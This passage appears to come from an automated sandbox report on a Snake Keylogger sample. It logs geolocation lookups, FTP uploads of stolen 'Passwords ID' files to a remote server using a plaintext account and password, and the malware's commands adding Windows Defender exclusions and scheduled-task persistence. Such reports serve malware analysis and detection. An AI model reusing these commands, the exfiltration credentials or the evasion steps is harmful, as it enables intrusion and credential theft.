2024-11-06 16:02:58 UTC	1223	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:58 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f82078ca-afc9-49d9-a069-17b9c217bb0b x-amzn-trace-id: Root=1-672afe19-4f30f76b7a34a0f953191245;Parent=529078be23d2486a;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 e316b59dcccd0d0a0f7515e0735beb68.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: -Swr5qbOQdl3bj7Oc7hw3i50AA3lkZIDYOLYOADaQcjijlUp1iiPRA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 38169 Last-Modified: Wed, 06 Nov 2024 05:26:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1VJ97E5s2gmX4xqpKwHhW%2BXxaQIo40IJuYaTCBu3QIIxmve53Q7T%2BETWqYXUnp0gcm%2FJ7a5kgHnFKoxIOtqyUCWXw3kXktjp7vHxcXCbPsY%2BUy6C6AgH%2BgHSX9xfwiv%2B5LhsBkeu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8de64f9a4a0ee8ed-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1450&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2002766&cwnd=233&unsent_bytes=0&cid=dc67e14c0597aa08&ts=184&x=0"
2024-11-06 16:02:58 UTC	146	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Region
2024-11-06 16:02:58 UTC	213	IN	Data Raw: 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: Name>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	56923	188.114.96.3	443	7636	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-06 16:02:59 UTC	87	OUT	GET /xml/173.254.250.80 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-06 16:03:00 UTC	1213	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:59 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: 68d8c802-f830-4d99-b22d-aa66a416d868 x-amzn-trace-id: Root=1-672b818e-3fe698b34e09e04b5ebcaf79;Parent=0b99835eeee52a0d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 f923e65cfb5d73f11ea9a89d42fad5fc.cloudfront.net (CloudFront) x-amz-cf-pop: DEN52-C1 x-amz-cf-id: VAMjkjwUr0TN8uZkoUg74pQ78zDtUU3uyR1s9VYeqs4wXz8gbpFGsw== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4517 Last-Modified: Wed, 06 Nov 2024 14:47:42 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=afS8NfmH1Re1vMJfZdmjeOq6xfKJTwtjqiPcQuvKgawwluxxphet%2BA95KHb9shq64OYNjkuafdxL4zg3HLXYssoApvI5CGzNitxTdd8E50Xt3UuRCltsbNPYDUX6VFDJ6Fpfh2S%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8de64fa4db1de775-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19175&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=150168&cwnd=32&unsent_bytes=0&cid=f77096de4ad0a8b9&ts=167&x=0"
2024-11-06 16:03:00 UTC	156	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas
2024-11-06 16:03:00 UTC	203	IN	Data Raw: 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: </RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	56931	188.114.96.3	443	7636	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-06 16:03:01 UTC	63	OUT	GET /xml/173.254.250.80 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-06 16:03:01 UTC	1219	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:03:01 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f82078ca-afc9-49d9-a069-17b9c217bb0b x-amzn-trace-id: Root=1-672afe19-4f30f76b7a34a0f953191245;Parent=529078be23d2486a;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 e316b59dcccd0d0a0f7515e0735beb68.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: -Swr5qbOQdl3bj7Oc7hw3i50AA3lkZIDYOLYOADaQcjijlUp1iiPRA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 38172 Last-Modified: Wed, 06 Nov 2024 05:26:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rUm468hKXNi329Wjrq8YiAToG7gSd6zIk3snqSFEpyNIyW%2Bbrvc3TbVlMTrKYnUa0O%2F6pvBtdqyg29X9zOuAimx5mknNaMcYa5WQW%2Fcikacm%2F2fzgilQJ9W8SRqGf7Il37kXEsM9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8de64faf2ba62845-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1409&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1892810&cwnd=251&unsent_bytes=0&cid=d815b20762d9c5e5&ts=182&x=0"
2024-11-06 16:03:01 UTC	150	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
2024-11-06 16:03:01 UTC	209	IN	Data Raw: 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 6, 2024 17:03:03.548172951 CET	21	50094	50.31.176.103	192.168.2.6	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 500 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 500 allowed.220-Local time is now 11:03. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 500 allowed.220-Local time is now 11:03. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 500 allowed.220-Local time is now 11:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 500 allowed.220-Local time is now 11:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Nov 6, 2024 17:03:03.551290035 CET	50094	21	192.168.2.6	50.31.176.103	USER somac@gdmaduanas.com
Nov 6, 2024 17:03:03.701250076 CET	21	50094	50.31.176.103	192.168.2.6	331 User somac@gdmaduanas.com OK. Password required
Nov 6, 2024 17:03:03.709415913 CET	50094	21	192.168.2.6	50.31.176.103	PASS HW=f09RQ-BL1
Nov 6, 2024 17:03:03.994502068 CET	21	50094	50.31.176.103	192.168.2.6	230 OK. Current restricted directory is /
Nov 6, 2024 17:03:04.144268036 CET	21	50094	50.31.176.103	192.168.2.6	504 Unknown command
Nov 6, 2024 17:03:04.144442081 CET	50094	21	192.168.2.6	50.31.176.103	PWD
Nov 6, 2024 17:03:04.294661045 CET	21	50094	50.31.176.103	192.168.2.6	257 "/" is your current location
Nov 6, 2024 17:03:04.298115015 CET	50094	21	192.168.2.6	50.31.176.103	TYPE I
Nov 6, 2024 17:03:04.448101044 CET	21	50094	50.31.176.103	192.168.2.6	200 TYPE is now 8-bit binary
Nov 6, 2024 17:03:04.448419094 CET	50094	21	192.168.2.6	50.31.176.103	PASV
Nov 6, 2024 17:03:04.598160028 CET	21	50094	50.31.176.103	192.168.2.6	227 Entering Passive Mode (50,31,176,103,132,236)
Nov 6, 2024 17:03:04.603588104 CET	50094	21	192.168.2.6	50.31.176.103	STOR 358075 - Passwords ID - ZyiAEnXWZP344552897.txt
Nov 6, 2024 17:03:05.132082939 CET	21	50094	50.31.176.103	192.168.2.6	150 Accepted data connection
Nov 6, 2024 17:03:05.278944969 CET	21	50094	50.31.176.103	192.168.2.6	226-File successfully transferred 226-File successfully transferred226 0.148 seconds (measured here), 2.35 Kbytes per second
Nov 6, 2024 17:03:08.277299881 CET	21	50114	50.31.176.103	192.168.2.6	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 500 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 500 allowed.220-Local time is now 11:03. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 500 allowed.220-Local time is now 11:03. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 500 allowed.220-Local time is now 11:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 500 allowed.220-Local time is now 11:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Nov 6, 2024 17:03:08.277585030 CET	50114	21	192.168.2.6	50.31.176.103	USER somac@gdmaduanas.com
Nov 6, 2024 17:03:08.422110081 CET	21	50114	50.31.176.103	192.168.2.6	331 User somac@gdmaduanas.com OK. Password required
Nov 6, 2024 17:03:08.422483921 CET	50114	21	192.168.2.6	50.31.176.103	PASS HW=f09RQ-BL1
Nov 6, 2024 17:03:08.595705986 CET	21	50114	50.31.176.103	192.168.2.6	230 OK. Current restricted directory is /
Nov 6, 2024 17:03:08.742561102 CET	21	50114	50.31.176.103	192.168.2.6	504 Unknown command
Nov 6, 2024 17:03:08.742691040 CET	50114	21	192.168.2.6	50.31.176.103	PWD
Nov 6, 2024 17:03:08.888961077 CET	21	50114	50.31.176.103	192.168.2.6	257 "/" is your current location
Nov 6, 2024 17:03:08.889298916 CET	50114	21	192.168.2.6	50.31.176.103	TYPE I
Nov 6, 2024 17:03:09.998716116 CET	21	50114	50.31.176.103	192.168.2.6	200 TYPE is now 8-bit binary
Nov 6, 2024 17:03:09.999053955 CET	21	50114	50.31.176.103	192.168.2.6	200 TYPE is now 8-bit binary
Nov 6, 2024 17:03:09.999305964 CET	21	50114	50.31.176.103	192.168.2.6	200 TYPE is now 8-bit binary
Nov 6, 2024 17:03:09.999531031 CET	21	50114	50.31.176.103	192.168.2.6	200 TYPE is now 8-bit binary
Nov 6, 2024 17:03:10.002104044 CET	50114	21	192.168.2.6	50.31.176.103	PASV
Nov 6, 2024 17:03:10.148757935 CET	21	50114	50.31.176.103	192.168.2.6	227 Entering Passive Mode (50,31,176,103,125,33)
Nov 6, 2024 17:03:10.189915895 CET	50114	21	192.168.2.6	50.31.176.103	STOR 358075 - Passwords ID - ZyiAEnXWZP907345695.txt
Nov 6, 2024 17:03:10.489619017 CET	50114	21	192.168.2.6	50.31.176.103	STOR 358075 - Passwords ID - ZyiAEnXWZP907345695.txt
Nov 6, 2024 17:03:10.510365963 CET	21	50114	50.31.176.103	192.168.2.6	227 Entering Passive Mode (50,31,176,103,125,33)
Nov 6, 2024 17:03:11.020520926 CET	21	50114	50.31.176.103	192.168.2.6	150 Accepted data connection
Nov 6, 2024 17:03:11.168550014 CET	21	50114	50.31.176.103	192.168.2.6	226-File successfully transferred 226-File successfully transferred226 0.148 seconds (measured here), 2.35 Kbytes per second

Target ID:	0
Start time:	11:02:38
Start date:	06/11/2024
Path:	C:\Users\user\Desktop\hesaphareketi-01.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\hesaphareketi-01.exe"
Imagebase:	0x480000
File size:	797'696 bytes
MD5 hash:	FB1DDD3D10CA671F437C6F2F3C9D6E57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:02:39
Start date:	06/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe"
Imagebase:	0x330000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:02:39
Start date:	06/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:02:39
Start date:	06/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WvaGpcFVX.exe"
Imagebase:	0x330000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:02:39
Start date:	06/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:02:39
Start date:	06/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp470C.tmp"
Imagebase:	0x1d0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:02:39
Start date:	06/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:02:40
Start date:	06/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0xa00000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.4701100037.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.4701100037.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.4701100037.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	11:02:42
Start date:	06/11/2024
Path:	C:\Users\user\AppData\Roaming\WvaGpcFVX.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\WvaGpcFVX.exe
Imagebase:	0xa30000
File size:	797'696 bytes
MD5 hash:	FB1DDD3D10CA671F437C6F2F3C9D6E57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 39%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:02:43
Start date:	06/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff717f30000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:02:44
Start date:	06/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp5A94.tmp"
Imagebase:	0x1d0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:02:44
Start date:	06/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	11:02:45
Start date:	06/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x230000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	11:02:45
Start date:	06/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x930000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.4701852091.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.4701852091.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.4701852091.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	8.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	46
Total number of Limit Nodes:	5

Executed Functions

Function 07242278 Relevance: .4, Instructions: 395COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2291258617.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

